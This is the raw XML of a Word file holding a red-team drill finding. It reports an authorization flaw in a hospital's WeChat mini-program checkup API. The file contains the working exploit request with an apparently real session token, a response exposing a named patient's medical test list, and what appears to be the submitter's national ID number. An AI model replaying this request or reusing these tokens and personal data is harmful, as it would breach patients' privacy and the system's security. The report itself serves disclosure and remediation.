
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bmp" ContentType="image/bmp"/>
  <Default Extension="svg" ContentType="image/svg+xml"/>
  <Default Extension="jfif" ContentType="image/jpeg"/>
  <Default Extension="wmf" ContentType="image/x-wmf"/>
  <Default Extension="gif" ContentType="image/gif"/>
  <Default Extension="jpe" ContentType="image/jpeg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spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">演练名称：齐鲁医院2024安全周攻防演练</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击成果标题：体检报告实时结果处越权他人体检信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击成果编号：145650_G_92554_CbkKhqUq</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">审核状态：审核通过</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击方团队名称：安恒信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">防御单位团队名称：齐鲁医院</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">网络层级：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">风险等级：低危</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">目标系统名称：山东大学齐鲁医院微信小程序</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击方式：软件类漏洞利用</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">目标系统域名：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">URL：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">被攻击系统主机或数据库地址：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">是否上传后门等恶意程序地址：否）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞类型：获取目标系统权限/互联网区</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">资产系统类型：WEB应用/官方网站</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击入口IP：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击出口IP：183.134.99.176</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">资产外网IP：123.123.123.123</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">资产内网IP：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">成果发现时间：2024/09/11 14:54:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">隐患地址：https://ctzx.qiluhospital.com/api/customize/orderCheckState?identity=162</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">成果证明截图：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4977168" cy="8000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Pic1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4977168" cy="8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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7000000" cy="3330917"/>
            <wp:docPr id="2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Pic2"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7000000" cy="3330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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7000000" cy="1986242"/>
            <wp:docPr id="3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Pic3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7000000" cy="1986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rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">其他说明：见目录导出的附件信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">隐患描述：体检报告实时结果处敏感信息泄露</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">提交人：411328199811197216</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">提交时间：2024/09/11 14:56:50</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">资产归属证明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="p+(p)"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4977168" cy="8000000"/>
            <wp:docPr id="4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Pic4"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4977168" cy="8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="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">成果说明：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">(1)成果影响危害说明：体检报告实时结果处越权他人体检信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">(2)存在的问题：体检报告实时结果处越权他人体检信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">(3)整改建议：对用户的每一步操作鉴权处理。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击过程描述：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="h2+(h2)"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="260" w:before="260" w:line="380" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="(h2-c)-c"/>
          <w:b/>
          <w:rFonts w:ascii="arial" w:hAnsi="arial" w:cs="arial" w:eastAsia="arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">请求包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GET /api/customize/orderCheckState?identity=162 HTTP/1.1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Host: ctzx.qiluhospital.com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Cookie: ekToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoie1wiQ29kZVwiOlwiYjhiZmRhMzctMjNmNS00NmQ1LWE5YWMtN2Q0ODJmYjIxOTIxXCIsXCJMb2dpbk5hbWV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-7-c"/>
        </w:rPr>
        <w:t xml:space="preserve">cIjpcIjQxMTMyODE5OTgxMTE5NzIxNlwiLFwiTmFtZVwiOlwiXCIsXCJSb2xlXCI6MCxcIlJvbGVOYW1lXCI6XCJ1c2VyXCJ9IiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoidXNlciIsIm5iZiI6MTcyNjAzNDMyMSwiZXhwIjoxNzI4NjI2MzIxLCJpc3MiOiLkuIrmtbf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-7-c"/>
        </w:rPr>
        <w:t xml:space="preserve">popDplK7kv6Hmga_mioDmnK_mnInpmZDlhazlj7hhcGkiLCJhdWQiOiLkuIrmtbfpopDplK7kv6Hmga_mioDmnK_mnInpmZDlhazlj7hjbGllbnQifQ.ZzuyVdLUjARSTlZrXC6kJrPKMQTsyoEdJYw_qW9niq0; ekCode=b8bfda37-23f5-46d5-a9ac-7d482fb21921; ekCodeForAppt=b8bfda37-23f5-46d5-a9ac-7d482fb21921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Accept: application/json, text/plain, */*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Ektoken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-7-c"/>
        </w:rPr>
        <w:t xml:space="preserve">ltcy9uYW1lIjoie1wiQ29kZVwiOlwiYjhiZmRhMzctMjNmNS00NmQ1LWE5YWMtN2Q0ODJmYjIxOTIxXCIsXCJMb2dpbk5hbWVcIjpcIjQxMTMyODE5OTgxMTE5NzIxNlwiLFwiTmFtZVwiOlwiXCIsXCJSb2xlXCI6MCxcIlJvbGVOYW1lXCI6XCJ1c2VyXCJ9IiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-7-c"/>
        </w:rPr>
        <w:t xml:space="preserve">50aXR5L2NsYWltcy9yb2xlIjoidXNlciIsIm5iZiI6MTcyNjAzNDMyMSwiZXhwIjoxNzI4NjI2MzIxLCJpc3MiOiLkuIrmtbfpopDplK7kv6Hmga_mioDmnK_mnInpmZDlhazlj7hhcGkiLCJhdWQiOiLkuIrmtbfpopDplK7kv6Hmga_mioDmnK_mnInpmZDlhazlj7hjbGllbnQifQ.ZzuyVdLUjARSTlZrXC6kJrPKMQTsyoEdJYw_qW9niq0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User-Agent: Mozilla/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-7-c"/>
        </w:rPr>
        <w:t xml:space="preserve">5.0 (Linux; Android 7.1.2; SM-G955N Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.131 Mobile Safari/537.36 MMWEBID/1208 MicroMessenger/8.0.27.2220(0x28001B36) WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm32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Clienttype: wechat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X-Requested-With: com.tencent.mm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Sec-Fetch-Site: same-origin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Sec-Fetch-Mode: cors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Sec-Fetch-Dest: empty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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="h2+(h2)"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="260" w:before="260" w:line="380" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="(h2-c)-c"/>
          <w:b/>
          <w:rFonts w:ascii="arial" w:hAnsi="arial" w:cs="arial" w:eastAsia="arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">响应包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HTTP/1.1 200 OK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Content-Type: text/plain; charset=utf-8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Vary: Accept-Encoding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Server: Microsoft-IIS/8.5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Date: Wed, 11 Sep 2024 06:35:56 GMT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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="p-6"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-7-c"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 1647</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="p-6"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p-6-c"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="p+(p)"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-9-c"/>
        </w:rPr>
        <w:t xml:space="preserve">{"data":{"statusCode":1,"message":"","orderCount":1,"personOrders":[{"age":94,"customerName":"应诗达","sex":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-9-c"/>
        </w:rPr>
        <w:t xml:space="preserve">"男","orderCode":"6464caa7-5e9b-45d5-8948-52dd140efbc2","cardNum":"EJ2102080963","checkBeginTime":"0001-01-01T00:00:00","orderStatus":0,"itemCount":23,"unFinishedItems":[{"itemCode":"10001","itemName":"体格检查"},{"itemCode":"10003","itemName":"内科检查"},{"itemCod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-9-c"/>
        </w:rPr>
        <w:t xml:space="preserve">e":"40403","itemName":"心电图"},{"itemCode":"40410","itemName":"甲状腺彩超"},{"itemCode":"40411","itemName":"上腹部彩超（空腹）"},{"itemCode":"40414","itemName":"颈动脉彩超"},{"itemCode":"40415","itemName":"男性膀胱前列腺彩超"},{"itemCode":"40616","itemName":"胸部CT平扫"},{"itemCode":"J0004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-9-c"/>
        </w:rPr>
        <w:t xml:space="preserve">","itemName":"尿常规(急诊)"},{"itemCode":"J0007","itemName":"静脉血常规(急诊)"},{"itemCode":"J0018","itemName":"肝功系列(生化)"},{"itemCode":"J0031","itemName":"肾功3项(生化)"},{"itemCode":"J0034","itemName":"血脂六项（生化）"},{"itemCode":"J0038","itemName":"血糖(生化)"},{"itemCode":"J0047</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-9-c"/>
        </w:rPr>
        <w:t xml:space="preserve">","itemName":"糖化血红蛋白测定(生化室)"},{"itemCode":"J0077","itemName":"肿瘤系列(TM-12)(中心)"},{"itemCode":"J0133","itemName":"甲状腺功能1"},{"itemCode":"J0219","itemName":"体检费"},{"itemCode":"J0220","itemName":"抽血费"},{"itemCode":"J0224","itemName":"一次性采血针"},{"itemCode":"J0228</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="span-9-c"/>
        </w:rPr>
        <w:t xml:space="preserve">","itemName":"彩超图文报告(1个)"},{"itemCode":"J0242","itemName":"早餐"},{"itemCode":"J0247","itemName":"真空采血管(6个)"}],"orderReportInfo":{"orderCode":"6464caa7-5e9b-45d5-8948-52dd140efbc2","lisExam":[],"notLisExam":[]}}]},"isSuccess":true,"errorCode":0,"message":""}</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:hyperlink w:tooltip="" r:id="rHyp1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a-c+(p-c+a-c)-c"/>
          </w:rPr>
          <w:t xml:space="preserve"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="normal"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normal"/>
        </w:rPr>
        <w:t xml:space="preserve">主渗透路径概要说明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="p+(p)"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p-c+(p-c)-c"/>
        </w:rPr>
        <w:t xml:space="preserve">123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="normal"/>
        <w:spacing w:line="450" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w: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</w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p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."/>
  <w:listSeparator w:val=",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ru-RU" w:bidi="ar-SA" w:eastAsia="en-US"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:lineRule="auto" w:line="276" w:after="200"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:styleId="normal" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="li">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="normal"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:contextualSpacing w:val="true"/>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="table-base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">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="table-based"/>
    <w:uiPriority w:val="59"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:after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">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="footnote-p">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="normal"/>
    <w:link w:val="footnote-c"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="footnote-c" w:customStyle="1">
    <w:name w:val="footnote text character"/>
    <w:link w:val="footnote-p"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="p" w:type="paragraph">
    <w:name w:val="Paragraph"/>
    <w:basedOn w:val="normal"/>
    <w:link w:val="p-c"/>
  </w:style>
  <w:style w:customStyle="1" w:styleId="p+(p)" w:type="paragraph">
    <w:name w:val="Paragraph"/>
    <w:basedOn w:val="normal"/>
    <w:qFormat/>
    <w:link w:val="p-c"/>
  </w:style>
  <w:style w:styleId="h2" w:type="paragraph">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="normal"/>
    <w:link w:val="h2-c"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="400"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="h2+(h2)" w:type="paragraph">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="normal"/>
    <w:qFormat/>
    <w:link w:val="h2-c"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="400"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="h2-c" w:type="character">
    <w:name w:val="Title 2 Sign"/>
    <w:link w:val="h2"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:sz w:val="33"/>
      <w:szCs w:val="33"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="(h2-c)-c" w:type="character">
    <w:name w:val="h2-c"/>
    <w:link w:val="h2"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:sz w:val="33"/>
      <w:szCs w:val="33"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="p-6" w:type="paragraph">
    <w:name w:val="p-6"/>
    <w:basedOn w:val="p+(p)"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="p-c" w:type="character">
    <w:name w:val="Paragraph character"/>
    <w:link w:val="p"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="(p-c)-c" w:type="character">
    <w:name w:val="p-c"/>
    <w:link w:val="p"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="span-7-c" w:type="character">
    <w:name w:val="span-7-c"/>
    <w:basedOn w:val="(p-c)-c"/>
    <w:rPr>
      <w:rFonts w:ascii="calibri" w:hAnsi="calibri" w:cs="calibri" w:eastAsia="calibri"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="p-c+(p-c)-c" w:type="character">
    <w:name w:val="Paragraph character"/>
    <w:link w:val="p"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="p-6-c" w:type="character">
    <w:name w:val="p-6-c"/>
    <w:basedOn w:val="p-c+(p-c)-c"/>
  </w:style>
  <w:style w:customStyle="1" w:styleId="span-9-c" w:type="character">
    <w:name w:val="span-9-c"/>
    <w:basedOn w:val="(p-c)-c"/>
    <w:rPr>
      <w:rFonts w:ascii="calibri" w:hAnsi="calibri" w:cs="calibri" w:eastAsia="calibri"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="a-c" w:type="character">
    <w:name w:val="Hyperlink character"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="a-c+(p-c+a-c)-c" w:type="character">
    <w:name w:val="Hyperlink character"/>
    <w:link w:val="p"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/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Pic1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/i4db8e21dd24d292ad8523f9aac7b9696.png"/><Relationship Id="rPic2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/i83122a436748b031d4c0e094cf3e191d.png"/><Relationship Id="rPic3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/i590a6b62b19391f25e203df30e71df87.png"/><Relationship Id="rPic4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/i9e475700bab6e9471f1990f08ddd80cf.png"/><Relationship Id="rHyp1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="" TargetMode="Externa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ONLYOFFICE/6.4.0.121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